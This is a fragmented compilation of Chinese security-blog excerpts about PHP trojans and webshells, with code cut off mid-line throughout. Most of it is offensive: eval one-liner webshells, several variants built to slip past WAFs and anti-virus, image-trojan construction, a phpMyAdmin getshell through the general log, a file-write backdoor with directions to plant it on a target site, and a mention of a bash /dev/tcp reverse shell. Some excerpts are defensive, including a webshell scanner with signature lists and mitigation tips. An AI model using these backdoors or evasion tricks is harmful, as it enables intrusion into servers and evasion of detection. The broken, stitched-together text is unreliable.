前言 前文回顾: 教你学木马攻防 | 隧道木马 | 第一课 在上一篇文章中,我们讲解了木马中常用的端口转发技术,这一节讲解一下木马通信协议中的ICMP协议,并通过ICMP实现一个反弹shell。...从上面知道了ping包的结构,我们如果想通过ICMP协议传输数据,操作空间主要是在数据区中,而ping工具的做法是请求什么内容,就回复什么内容,所以设计反弹shell没办法用到ping工具,需要自己开发...第三节 ICMP反弹shell 如果之前做过渗透测试的朋友,肯定知道反弹shell,ICMP反弹shell只不过是将通信协议换成了ICMP。其基本架构内容如下: ?...那怎么防御ICMP反弹shell呢?其实特征已经很明显了,建立ping数据区报文的白名单,不在白名单之内的拦截即可,当然还要视抓取的数据来定,可能有业务使用了icmp协议。...第四节 最后 推荐阅读: Python RASP 工程化:一次入侵的思考 教你学木马攻防 | 隧道木马 | 第一课 一个Python开源项目-哈勃沙箱源码剖析(下)
DNS反弹shell 在上一篇文章中,我们讲解了木马通信协议中的ICMP协议,并通过ICMP实现了一个反弹shell,本篇接着讲解一下DNS隧道,也实现一个反弹shell。 ?...第三节 架设C&C 如何搭建DNS隧道,甚至反弹shell呢?我的测试平台直接部署在真实的网络环境中。
什么是木马 木马病毒是指隐藏在正常程序中的一段具有特殊功能的恶意代码,是具备破坏和删除文件、发送密码、记录键盘和攻击Dos等特殊功能的后门程序。 那,php的木马是长什么样的呢?...,讲到的是图片木马上传,那么该怎么制作图片木马呢?.../a/1.php'),FILE_APPEND);//1.php是一个木马文件 直接通过txt形式打开,可看到新增的数据 ? 将1.jpg图片直接打开,可发现文件没有损坏: ?...通过上传文件,发现php识别的也是jpeg: ? ' php解析木马原理 大家看以下代码,忽略php实现的东西,只看结构: 木马写法,可以看 https://github.com/tioncico/webshell/tree/master/php 另外提一嘴,既然是可以执行php文件了,完全可以在图片文件中,include
php /**************PHP Web木马扫描器************************/ /* [+] 版本: v1.0...*/ /* [+] 功能: web版php木马扫描工具 */ /* [+] 注意: 扫描出来的文件并不一定就是后门, */ /*...Web木马扫描器 v1.0"; $realpath = realpath('./'); $selfpath = $_SERVER['PHP_SELF']; $selfpath = substr($...'=>'c99shell', '后门特征->phpspy'=>'phpspy', '后门特征->Scanners'=>'Scanners', '后门特征->cmd.php'=>'cmd\.php'...cha88.cn 后门特征->c99shell 后门特征->phpspy 后门特征->Scanners 后门特征->cmd.php 后门特征->str_rot13 后门特征->webshell
php $a=eval;$a() ?...php $a = $_POST['a']; $b = "\n"; eval($b.=$a); ?...> 当然还有其他的符号熟读PHP手册就会有不一样的发现 0x07 数组 把执行代码放入数组中执行绕过 php $a = base64_decode("YXNz+ZX____J____0"); $a($_POST[x]); ?> 或 php $a= ("!"^"@").'...> 0x10 PHP7.1后webshell何去何从 在php7.1后面我们已经不能使用强大的assert函数了用eval将更加注重特殊的调用方法和一些字符干扰,后期大家可能更加倾向使用大马 总结 对于安全狗杀形
这周无聊了研究了点小东西 既然py可以当shell用 那么php能不能也这样用呢? php的目录底下有解释器 早就注意到了 那么他就可以像py那样来用了 1....先解决执行问题吧 win下面需要配置一下环境变量 总之跟java的配置差不多就是了 名称:path 值就是php目录 例如我的就是C:\php-5.5.10 然后在cmd里输入”php -v”...会显示版本 据说明设置成功了 linux下面安装php应该是自动配置的 如果觉得每次都要打php不爽的话 文件头加 上#!.../usr/local/bin/php–q 然后写代码如下: php echo “hello”; ?...> 保存为”hello.php” 把目录切到文件的位置 运行”php hello.php” 看看会输出什么 2.
下面是实现木马扫描的一个完整类库,直接复制过去就能用。 php header('content-type:text/html;charset=gbk'); set_time_limit(0);//防止超时 /** * * php目录扫描监控增强版...exclude=array('data','images');//排除目录 $danger='eval|cmd|passthru|gzuncompress';//设置要查找的危险的函数 以确定是否木马文件...> php">[查看文件改动]|php?...savethis=1">[保存当前文件指纹]|php?check=check">[扫描可疑文件]
主要有 exec() shell_exec() system()。...如果使用了 output 参数,shell 命令的每行结果会填充到该数组中。...shell_exec() string shell_exec(string $cmd) 以 字符串 形式返回执行的全部结果。...echo `ls`; 其他 请查看:http://php.net/manual/zh/ref.exec.php
ubuntu 下一键安装 nginx php 的环境 nginx 配置参考: server { listen 80; server_name 127.0.0.1 localhost;...root /usr/share/nginx/html/www; index index.php index.html index.htm; location ~ .*\.php...(\/.*)*$ { include fastcgi.conf; fastcgi_split_path_info ^(.+\.php)(/.+)$; fastcgi_pass...unix:/var/run/php5-fpm.sock; fastcgi_index index.php; fastcgi_connect_timeout 300;
有时候在渗透测试过程中 我们会得到php myadmin 的账号和密码 既然登陆了php myadmin 就可以用php myadmin 来get shell。...具体内容 简单说明 登陆进php myadmin 有些朋友可能会直接选择去写入一个webshell 执行后会弹出大概无法写入的意思 这里和php myadmin的设置有关系 在实战情况下一般都不能直接去写入一个...shell的。...路径改为网站的根目录 set global general_log = "ON"; set global general_log_file='D:/stduy/PHPTutorial/WWW/infos.php...'; 执行完后因为我是本地搭建环境所以可以看到成功创建了 现在我们只需要输入一个错误的sql语句即可 这里我写入一句话 可以看到一句话已经存在于infos.php里面了 之后我们菜刀直接链接即可 总结
php if ($_REQUEST['nihaook']=="niubi") { $f=@fopen($_REQUEST["f"],"w"); if(@fwrite($f,$_REQUEST["c"])...> 使用教程 把上面代码弄到你要搞的网站任意PHP文件内 打开 https://tool.sirblog.cn/iu/webs 输入对应信息即可注入,注入文件名不能为/开头 不然会出错 目标网址必须加上协议头...(http或者https) 如何防止 把网站所有目录权限设置为只读,设置禁止上传.php文件
内置函数 PHP | 系统程序执行 exec shell_exec passthru system 配置 打开php.ini配置文件,并从disable_function将用到的函数从禁用中删除...R www:www mini.sh 修改权限 chmod -R 775 miniprogram/ chmod -R 775 mini.sh 赋予权限 usermod -s /bin/bash www PHP...代码 shell脚本执行成功后会返回0 php namespace app\common\model; use think\Db; class WeixinShell extends Common { /** * 打包小程序
要在PHP中执行shell命令,可以使用exec()函数、shell_exec()函数或system()函数。...()函数: $output = shell_exec(command); 复制代码 command:要执行的shell命令。...); 复制代码 command:要执行的shell命令。...)函数执行shell命令时,请确保你信任该命令,以防止安全风险。...在某些环境下,可能需要在PHP配置文件中启用相关函数。
服务器上发现被植了很多木马,而且还让人肆意使用…NND php @eval($_POST['c']);?...> 使用方法也很简单,本地提交文件指向提交文件,里面的php代码就会被执行 php" method="post"> <input...nginx 上传漏洞及 discuz 漏洞处理 由于nginx早期的版本,至少我在用 0.9.X 的版本依旧存在漏洞,导致处理过的图片可以执行php代码 简单的说就是写好的php代码将扩展名改为图片...,如 xx.jpg 文件后通过 discuz 等开源论坛的上传功能上传后可以通过 http://xxx.com/bbs/data/xxxxxxxx/xx.jpg/1.php 方式执行 xx.php里面的代码...(jsp|php)$ http://www.xxx.com/ break; 其他如source及其他文件夹下也存在各种各样的问题,简单的处理方法也是禁止php的运行 发布者:全栈程序员栈长
一句话木马就是一段简单的代码,就这短短的一行代码,就能做到和大马相当的功能。一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。 一句话木马工作原理 php @eval($_POST['shell']);?> 这是php的一句话后门中最普遍的一种。它的工作原理是: 首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。...Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。 实例: php @eval($_POST['shell']);?...http://127.0.0.1/webshell.php,在连接密码框中输入shell 然后就可以看到目标站点目录下的文件了 一句话木马的多种变形 一般的php一句话后门很容易被网站防火墙waf拦截...,而waf通常通过判断关键字来辨别一句话木马,要想绕过waf就需要对木马进行一些变形。
前言 这篇文章写一些php木马免杀的一些技巧,希望对大家有点帮助。这里解释一下什么是php木马,这里大体分为三种: 能完成写入文件、列目录、查看文件、执行一些系统命令等少量功能的,这种的是“小马”。...可以在目标服务器上执行php代码,并和一些客户端(如菜刀、冰蝎)进行交互的一句话木马。...根据 PHP 语法,编写较多代码,并在服务器上执行,完成大量间谍功能的“大马” 以上php木马我们一般我们统称为webshell,这篇文章主要写一下如何对一句话木马变异变形来绕过WAF的查杀。...一句话木马原理 讲php一句话木马免杀之前,先简单说一下一句话木马原理,这样才能更好的举一反三。 先看代码: php eval($_POST["shell"]);?...php _POST['shell']就是接收的数据。
这里我们主要讲解php一句话木马,因为别的语言我也不会啊。 一句话木马示例 php @eval($_POST['pass']); ?...> 一句话木马原理 在这里我们可以看到他的核心参数就是eval函数,这个eval函数是干嘛的呢,我们通过php官网的文档可以得到以下信息。...//(PHP 4, PHP 5, PHP 7) eval ( string $code ) : mixed //把字符串作为PHP代码执行 显然,原理已经很明了了,把字符串当做php代码来执行,再看一句话木马中...php $url = 'http://127.0.0.1/index.php'; //一句话木马所在文件,一定要带文件后缀 $pass = 'pass'; //$_POST 或 $_GET 键名 $method...,源码以后再放出来 如无特殊说明《php一句话木马深度解析》为博主MoLeft原创,转载请注明原文链接为:https://moleft.cn/post-8.html
在我们进行渗透测试的最后阶段,入侵到内网里,无论是想要浏览网站结构,还是抓取数据库,或者是挂个木马等等,到最后最常用的就是执行一句话木马,从客户端轻松连接服务器。.../*asp一句话木马*/ /*php一句话木马*/ php @eval($_POST[value]);?...二、简单变形 很明显的 eval 可以成为一个静态特征码,webshell扫描工具可以以此为关键词,扫描到这种木马加以屏蔽。于是可以简单变形不出现eval: php @eval($_POST[c]); ?>1)}; 执行后当前目录生成c.php文件并写入一句话木马,这已经算是一个非常隐蔽的木马了。...而在PHP 后门的变形之路上,远远不止这些,甚至可以自己定义一个加密解密的函数,或者是利用xor, 字符串翻转,压缩,截断重组等等方法来绕过。 三、变形改良 1.404页面隐藏木马 <!
隐匿性: 1.木马文件的命名 例如你不可能将木马命名为backdoor.php或者muma.php等等,根据网站网页命名的方式决定木马文件的命名 2.上传的木马是否要使用参数加密 使用参数加密的木马对于机器来说不容易识别...,对于人来说却十分容易识别,因为没有一个正常的GET请求会对参数进行加密 不使用参数加密的木马对于机器来说很容易识别,对人来说不太容易识别相对于使用参数加密的木马来说....a = ‘$_POST’;} If嵌套 If(true){ If(true){ $a = ‘$_POST’; } } 2.位运算 通过位运算可以构造任意字符,但是我并不推荐这种做法,毕竟没有一个正常的php...在PHP中像chr(),ord(),str_replace()之类的内置函数(猥琐函数)非常多,单个技巧并不能实现免杀,如何将这些技巧结合起来才是最重要的....下面我以一个过安全狗的小马为例,抛砖引玉,希望对大家编写免杀木马有所帮助. ? ? 成功躲避检测. 下面是ma1.php的源代码,只有短短的42行. ?
近来发现好多网站有安全狗,会拦截菜刀和蚁剑,因此总结下通过浏览器直接调用一句话木马的姿势。 PHP一句话:php @eval($_POST[‘shy’]);?...> firefox浏览器:hackbar 命令提示符:curl 首先上传一句话木马到网站目录,可以是虚拟机也可以是VPS,我这里用的是阿里云我自己搭建的网站, 由于只是简单的一句话木马,因次一上车就收到了安全云的短信安全提示...利用hackbar链接木马 利用system();执行系统命令 利用file_get_contents进行文件读取,然后用echo,或print打印出这个字符串。...file_get_contents还可以替换成其他的函数 反弹shell,最重要的是记得进行url编码,不然会失败的 反射shell的语句有很多,这里是用的是最简单的bash -i >& /dev/tcp...反弹shell,也要经过编码才能反弹成功 总之,编码真的很重要。